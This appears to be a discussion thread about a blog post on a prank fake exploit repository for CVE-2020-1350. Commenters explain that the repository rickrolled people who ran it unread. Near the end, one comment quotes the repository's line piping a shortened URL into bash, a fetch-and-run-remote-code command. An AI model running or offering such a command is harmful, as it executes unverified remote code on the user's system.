The day I trolled the entire internet: accidental research project CVE-2020-1350
blog.zsec.uk
blog.zsec.uk
1) Microsoft has a critical flaw in DNS server
2) A security company publishes the info - no public exploit available at this point
3) Someone creates a fake exploit - playing a prank on hackers and other security companies
4) Lots of people ran the prank code or helped spread the existence of the fake exploit
Not sure if this makes it easier to understand- at least I tried. :)
CVE-2020-1350 is a real vulnerability that was published just yesterday:
https://nvd.nist.gov/vuln/detail/CVE-2020-1350
It's a brand new vuln so people would be interested in a proof of concept. The author created a git repo that was nominally a PoC exploit for this vulnerability but was really just a troll, and publicized it on twitter.
Some people ran the "proof of concept" code without reading it first and got trolled. If the author had been malicious they could have done something much worse than rickrolling.
The repo also contains a real fix for the vulnerability.
This is a particularly "amusing" troll because the sort of people who keep up with CVEs and look for proof-of-concept exploits should really know better than to run random code they just got off GitHub without checking what it does.
It's obvious with the most cursory examination of the code in the repo that you shouldn't run it, exploit.sh contains:
curl -L https://bit.ly/3exifav | bash0: https://blog.thinkst.com/p/canarytokensorg-quick-free-detect...